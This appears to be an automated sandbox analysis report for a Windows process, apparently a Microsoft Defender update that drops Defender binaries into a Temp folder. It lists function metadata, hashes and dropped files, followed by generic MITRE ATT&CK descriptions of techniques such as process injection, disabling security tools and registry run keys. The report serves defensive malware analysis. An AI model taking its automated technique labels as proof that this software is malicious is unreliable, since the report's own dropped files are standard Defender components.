Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateUuid
String ID: 1.1.18500.10$EnableETW
API String ID: 1827684710-3293383016
Opcode ID: 5f0c81bb8d949075ef0134c8a462ed3b04bb0ad7cc893a333289163e6b768873
Instruction ID: 5c2698a9ed765e3cfac1e123094aa1023de3acf8807859b1d9dfcb40a792d04e
Opcode Fuzzy Hash: 5f0c81bb8d949075ef0134c8a462ed3b04bb0ad7cc893a333289163e6b768873
Instruction Fuzzy Hash: 6FA14F72A0C78286E760AB19B8403AAF7A4FBAAB50F844135DB8D4375EDF3DD454CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584F8E4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7B584F954

Strings

RCC, xrefs: 00007FF7B584F970
MOC, xrefs: 00007FF7B584F968

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: fe58b7c6ca670b8b975fa7002a940410e4f3cf3d142e63d25ba612959b3722f7
Instruction ID: 1cd08cdca8349ae5ac266ced58fd095db661ad77641e720f9239b4a6a3b06256
Opcode Fuzzy Hash: fe58b7c6ca670b8b975fa7002a940410e4f3cf3d142e63d25ba612959b3722f7
Instruction Fuzzy Hash: BA91B273A087858EE711DB68E4402ADBBA0FB5AB88F544129EF8D1775EDF38D1A5C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584DD80, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

RtlUnwindEx.NTDLL ref: 00007FF7B584DE8F

Strings

f, xrefs: 00007FF7B584DDBE
csm, xrefs: 00007FF7B584DE26

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Unwind
String ID: csm$f
API String ID: 3419175465-629598281
Opcode ID: d88a19fff3612d27e61ac807bc9fb331b1b7bf4b4a12480efbb66109b038e7d9
Instruction ID: 34539f5efda106b6a385ee0a869f575534bd7cd805bffba304ece3071b03bce8
Opcode Fuzzy Hash: d88a19fff3612d27e61ac807bc9fb331b1b7bf4b4a12480efbb66109b038e7d9
Instruction Fuzzy Hash: 17519331A166518AF724EB19E444A39B752FB26F98F908134EF4E4778EDF38E851C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584F6CC, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7B584F718

Strings

RCC, xrefs: 00007FF7B584F735
MOC, xrefs: 00007FF7B584F72C

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: d046e8ddd2edc7a5ebe59f8e7f89db0542d1cda8b4724d45f8a947efffb38f12
Instruction ID: 9e85b5661f978d6836781e7cce27586a12c5860a1c8138721e9dd12bdd0519d2
Opcode Fuzzy Hash: d046e8ddd2edc7a5ebe59f8e7f89db0542d1cda8b4724d45f8a947efffb38f12
Instruction Fuzzy Hash: 4D514E32A08A858AE710DF69D0403ADB7A0FB59B88F544129EF4D17B5EDB3CE1A5C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5849184, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7B584929B
GetLastError.KERNEL32 ref: 00007FF7B58492BD

Strings

U, xrefs: 00007FF7B5849247

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 73ed1e333d058feaef224416e54c44167c2fcd544b914cba6f14c38926e9111b
Instruction ID: f68979adfacdd23314084d41820e19cff5bbb53acfcfff8a8bece0349ce92ad2
Opcode Fuzzy Hash: 73ed1e333d058feaef224416e54c44167c2fcd544b914cba6f14c38926e9111b
Instruction Fuzzy Hash: 3A41B622718A5586DB20EF29E4843A9B7A0FBA9B94F804131EF4D8775DDF3CD451CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582C9B4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 00007FF7B582CA0F
RegCloseKey.ADVAPI32 ref: 00007FF7B582CA71

Part of subcall function 00007FF7B57C7204: TraceMessage.ADVAPI32 ref: 00007FF7B57C7281

Strings

SOFTWARE\Microsoft\MpSigStub, xrefs: 00007FF7B582C9D5, 00007FF7B582CA3B

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateMessageTrace
String ID: SOFTWARE\Microsoft\MpSigStub
API String ID: 1667400433-301249796
Opcode ID: 5a4bb1a975a1651805f19f4f910a0d5d977a7ed6c88216f430c61aace7b4172a
Instruction ID: f368a142c4a4f8093d0ab0b5e7b8b04a91cb2f41847dab4eb7a8ff4329a95802
Opcode Fuzzy Hash: 5a4bb1a975a1651805f19f4f910a0d5d977a7ed6c88216f430c61aace7b4172a
Instruction Fuzzy Hash: 2D213372B08B4281EB20DF09E840A78B7A4FB95B84FA14236CB9D4336DDF3AD855C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DEAEC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

TraceMessage.ADVAPI32 ref: 00007FF7B57DEBD1

Strings

NULL, xrefs: 00007FF7B57DEB32
NULL, xrefs: 00007FF7B57DEB6D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageTrace
String ID: NULL$NULL
API String ID: 471583391-284533664
Opcode ID: bfdc13f271a8955eb63e87758b7cb8f2f5f0424b3114ce0a435b3a3ebfc2c006
Instruction ID: c138c3bb676cbabad20d607959c92cdfbf5797f6904d7ad2be691cae2b6e98d4
Opcode Fuzzy Hash: bfdc13f271a8955eb63e87758b7cb8f2f5f0424b3114ce0a435b3a3ebfc2c006
Instruction Fuzzy Hash: 6521D2A2708B8981E611DB05F400A69B3A4FB6AFD0F944235DF9E4379ECF3CE9558750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5828190, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32 ref: 00007FF7B58281E0

Part of subcall function 00007FF7B57C570C: TraceMessage.ADVAPI32 ref: 00007FF7B57C571F

Strings

kernelbase.dll, xrefs: 00007FF7B582820B
GetTempPath2W, xrefs: 00007FF7B5828204

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePathTempTrace
String ID: GetTempPath2W$kernelbase.dll
API String ID: 3710558428-1418961652
Opcode ID: deae31b376836f6580374304c746e53fa4337a13502430d22c1ef586dbf421fc
Instruction ID: cdd1bc1d8975a1ef9e0108ad2e8979a584162a2acdf3aa34815db5be17b8e4d1
Opcode Fuzzy Hash: deae31b376836f6580374304c746e53fa4337a13502430d22c1ef586dbf421fc
Instruction Fuzzy Hash: 83217C21A08B4681EE44B71DE8802B5A761EFB6F44FD40031CB5D466AFDF7EE4A58A20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584E174, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00007FF7B584E1C2
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B57C3937), ref: 00007FF7B584E208

Strings

csm, xrefs: 00007FF7B584E1F5

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 092f05bcc3ee423e4ef5e9f70ac14aafdd4597ce0e523a5b6889605cb13eca60
Instruction ID: 8b6784c037a22b176f21ef0b650955cf6cb91b97740e8f104f212b3421f62146
Opcode Fuzzy Hash: 092f05bcc3ee423e4ef5e9f70ac14aafdd4597ce0e523a5b6889605cb13eca60
Instruction Fuzzy Hash: CD116032608B8582EB109B19F440269B7A5FBA9F85F584231EF8D0B76DDF3CD561CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57C729C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

TraceMessage.ADVAPI32 ref: 00007FF7B57C733F

Strings

NULL, xrefs: 00007FF7B57C72D5
Miscellaneous Configuration, xrefs: 00007FF7B57C72E4

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageTrace
String ID: Miscellaneous Configuration$NULL
API String ID: 471583391-1415173233
Opcode ID: 29a867627e92c32ae4435c74f796d0c740fb0f2489c590d1463982b60c1bf27b
Instruction ID: 5e16dbc41a1d0a731c1fc94afba67611b022a2f8d9d50cd6a5a2ab74b47645c7
Opcode Fuzzy Hash: 29a867627e92c32ae4435c74f796d0c740fb0f2489c590d1463982b60c1bf27b
Instruction Fuzzy Hash: E2114632A08B9592E610EB09F440399B3A4F7A9B90F944235EB9E57B1ECF3CD516CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5830400, Relevance: 5.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7B5830430
LeaveCriticalSection.KERNEL32 ref: 00007FF7B5830462
EnterCriticalSection.KERNEL32 ref: 00007FF7B58304A7
LeaveCriticalSection.KERNEL32 ref: 00007FF7B5830526

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: a45e4a0d86bb89f774d1b2209bce616e57b4f22d4cb1f72a02198acc28f73d06
Instruction ID: c3b3cbe2006b5ea7c6b3f03f03dba4dfe45633696211012d17d3efb4dcdea188
Opcode Fuzzy Hash: a45e4a0d86bb89f774d1b2209bce616e57b4f22d4cb1f72a02198acc28f73d06
Instruction Fuzzy Hash: 2551C336A04A85C6EB159F29D844368B3A0FB69F98F984135EF4D137AECF3CD4658320

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpDetours.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpCmdRun.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDlpCmd.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpUpdate.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetours.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSvc.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MsMpEng.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpDetoursCopyAccelerator.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpAsDesc.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpUxAgent.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpRtp.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdNisDrv.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCmdRun.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\NisSrv.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdFilter.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ProtectionManagement.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAsDesc.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdDevFlt.sys	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\x86\endpointdlp.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAzSubmit.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCommu.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\DefenderCSP.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\mpextms.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpEvMsg.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetoursCopyAccelerator.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\endpointdlp.dll	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ConfigSecurityPolicy.exe	Jump to dropped file

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

